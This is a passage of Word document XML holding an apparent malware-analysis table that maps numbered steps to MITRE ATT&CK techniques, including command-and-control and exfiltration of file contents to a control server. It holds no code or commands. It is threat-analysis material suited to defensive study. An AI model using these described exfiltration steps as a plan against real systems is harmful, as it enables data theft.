          <w:p w14:paraId="65250009" w14:textId="051A0895" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00421B95">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="577F587F" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B72EA4F" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1293C14D" w14:textId="7ED57046" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C/A</w:t>
            </w:r>
            <w:r w:rsidR="00D354C0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496B7054" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:t>[1] Read a specified file’s contents and send the data to the control server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="03AC6301" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4003403E" w14:textId="484D9F4B" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C4530E"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21B31355" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="0035641D" w:rsidRDefault="00F423B5" w:rsidP="0011494A">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6DF97626" w14:textId="46CCD3BA" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16367A95" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43095376" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57D3AB96" w14:textId="30E3A9F6" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E6A6B89" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:r>
              <w:t>Next command in from control in this case as below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="005E7360" w14:paraId="331BEAA8" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075ED723" w14:textId="3C94B863" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C700EEA" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F8FF7F" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="586E98D5" w14:textId="3E10A3AC" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25E9FA39" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C312431" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24462A38" w14:textId="7135C57C" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C/A</w:t>
            </w:r>
            <w:r w:rsidR="00F55E8B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32CE6596" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="005E7360" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:t>[1] Read a specified file’s contents and send the data to the control server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="0FB60DF0" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51060D97" w14:textId="32D11287" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70443C89"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04D33614" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="0035641D" w:rsidRDefault="00F423B5" w:rsidP="0011494A">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35CE5CBB" w14:textId="551A3362" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48C84601" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4632668F" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD3B3A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16955FC2" w14:textId="69038803" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B8746DA" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:r>
              <w:t>Next command in from control in this case as below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="155BE257" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="564163AA" w14:textId="0E3D0E89" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2599426E" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03964F5B" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="0035641D" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008442BB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008442BB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="386EFDEC" w14:textId="41852706" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1510127D" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24A21164" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD3B3A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7881E3D8" w14:textId="443FB3FB" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A0ED05A" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="1E2CC67E" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0106EEB0" w14:textId="1808715F" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01FF8991" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A37AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A37AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A37AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434D38EC" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="0035641D" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00515311">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00515311">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="048D9263" w14:textId="517E5504" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F13818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46358042" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D8648D5" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
